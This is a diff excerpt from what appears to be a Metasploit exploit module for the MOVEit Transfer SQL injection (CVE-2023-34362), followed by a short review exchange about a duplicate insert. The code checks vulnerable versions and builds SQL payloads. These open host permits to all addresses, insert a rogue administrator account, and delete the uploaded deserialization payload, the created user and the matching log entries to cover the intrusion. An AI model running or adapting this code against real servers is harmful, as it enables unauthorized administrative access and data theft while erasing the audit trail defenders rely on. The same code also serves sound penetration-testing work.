modules/exploits/windows/http/moveit_cve_2023_34362.rb

```diff
@@ -0,0 +1,471 @@
+
+    files_json = JSON.parse(res.body)
+    vprint_status("Initiated resumable file upload for fileId '#{files_json['fileId']}'...")
+    files_json
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=capa'),
+      'connection' => 'close',
+      'accept' => '*/*'
+    })
+    version = nil
+    if res && res.code == 200 && res.headers.key?('X-MOVEitISAPI-Version')
+      version = Rex::Version.new(res.headers['X-MOVEitISAPI-Version'])
+      # 2020.1.x AKA 12.1.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('12.1.0') && version < Rex::Version.new('12.1.10')
+      # 2021.0.x AKA 13.0.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.0.0') && version < Rex::Version.new('13.0.8')
+      # 2021.1.x AKA 13.1.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.1.0') && version < Rex::Version.new('13.1.6')
+      # 2022.0.x AKA 14.0.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.0.0') && version < Rex::Version.new('14.0.6')
+      # 2022.1.x AKA 14.1.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.1.0') && version < Rex::Version.new('14.1.7')
+      # 2023.0.x AKA 15.0.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('15.0.0') && version < Rex::Version.new('15.0.3')
+    else
+      return Exploit::CheckCode::Safe
+    end
+    return Exploit::CheckCode::Unknown
+  end
+
+  def cleanup_user(files_json)
+    hax_username = datastore['USERNAME']
+    hax_loginname = datastore['LOGIN_NAME']
+    deleteuser_payload = [
+      "DELETE FROM moveittransfer.fileuploadinfo WHERE FileID='#{files_json['fileId']}'", # delete the deserialization payload
+      "DELETE FROM moveittransfer.files WHERE UploadUsername='#{hax_username}'", # delete the file we uploaded
+      "DELETE FROM moveittransfer.activesessions WHERE Username='#{hax_username}'", #
+      "DELETE FROM moveittransfer.users WHERE Username='#{hax_username}'", # delete the user account we created
+      "DELETE FROM moveittransfer.log WHERE Username='#{hax_username}'", # The web ASP stuff logs by username
+      "DELETE FROM moveittransfer.log WHERE Username='#{hax_loginname}'", # The API logs by loginname
+      "DELETE FROM moveittransfer.log WHERE Username='Guest:#{@guest_email_addr}'", # The SQLi generates a guest log entry.
+    ]
+    sqli(@cookies, sqli_payload(deleteuser_payload))
+  end
+
+  def create_sysadmin
+    hax_username = datastore['USERNAME']
+    hax_password = datastore['PASSWORD']
+    hax_loginname = datastore['LOGIN_NAME']
+    createuser_payload = [
+      "UPDATE moveittransfer.hostpermits SET Host='*.*.*.*' WHERE Host!='*.*.*.*'",
+      "INSERT INTO moveittransfer.users (Username) VALUES ('#{hax_username}')",
```

Comment:
Can this insert statement explode if hax_username is attempted to be inserted twice? i.e. in the scenario of `cleanup_user` failing

Reply:
I ran into this while trouble shooting an issue actually and can confirm that if the user already exists, the module does not fail.